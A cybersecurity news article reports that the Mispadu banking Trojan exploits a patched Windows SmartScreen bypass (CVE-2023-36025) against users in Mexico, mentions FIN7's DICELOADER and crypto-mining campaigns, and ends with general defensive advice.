Exploitation of Windows SmartScreen Flaw by New Mispadu Banking Trojan

In the latest cybersecurity development, threat actors associated with the Mispadu banking Trojan have capitalized on a recently patched Windows SmartScreen security bypass flaw to compromise users in Mexico. This new variant of Mispadu, initially identified in 2019.

The attacks involve the use of phishing emails to distribute the Delphi-based Mispadu, an information stealer designed to target victims in the Latin American (LATAM) region. Metabase Q reported in March 2023 that Mispadu spam campaigns have successfully harvested over 90,000 bank account credentials since August 2022. Notably, Mispadu is part of the larger family of LATAM banking malware, alongside Grandoreiro, which was recently dismantled by Brazilian law enforcement.

The latest infection chain identified by Unit 42 utilizes rogue internet shortcut files within fake ZIP archives, exploiting the CVE-2023-36025 (CVSS score: 8.8) Windows SmartScreen bypass flaw, which was addressed by Microsoft in November 2023. The exploit involves the creation of a specifically crafted internet shortcut file or hyperlink pointing to malicious files that can evade SmartScreen’s warnings. The crafted .URL file contains a link to a threat actor’s network share with a malicious binary.

Once launched, Mispadu selectively targets victims based on their geographic location and system configurations, establishing contact with a command-and-control (C2) server for subsequent data exfiltration. Notably, the Windows flaw has been exploited by various cybercrime groups to deliver other malware, such as DarkGate and Phemedrone Stealer, in recent months.

Mexico has been a focal point for cyber campaigns over the past year, with attackers propagating information stealers and remote access trojans like AllaKore RAT, AsyncRAT, and Babylon RAT. The financially-motivated group TA558, active in the LATAM region since 2018, has specifically targeted the hospitality and travel sectors.

This development occurs in conjunction with Sekoia’s detailed insights into DICELOADER (aka Lizar or Tirion), a well-established custom downloader utilized by the Russian e-crime group FIN7. The malware, delivered through malicious USB drives (BadUSB), includes a PowerShell script dropping DICELOADER and other tools like Carbanak RAT, showcasing sophisticated obfuscation methods to conceal C2 IP addresses and network communications.

Additionally, the research has recently discovered two malicious cryptocurrency mining campaigns utilizing booby-trapped archives and game hacks to deploy miner malware mining Monero and Zephyr. These ongoing developments underscore the dynamic nature of cyber threats and the need for continued vigilance in the face of evolving tactics by malicious actors.

To safeguard against threats like Mispadu leveraging Windows SmartScreen flaws, it is crucial to keep systems updated with the latest security patches. Additionally, users should exercise caution when handling emails, especially those with suspicious attachments or links. Employing robust antivirus and anti-malware solutions, along with user education on recognizing phishing attempts, can significantly enhance the overall defense posture against such banking Trojans.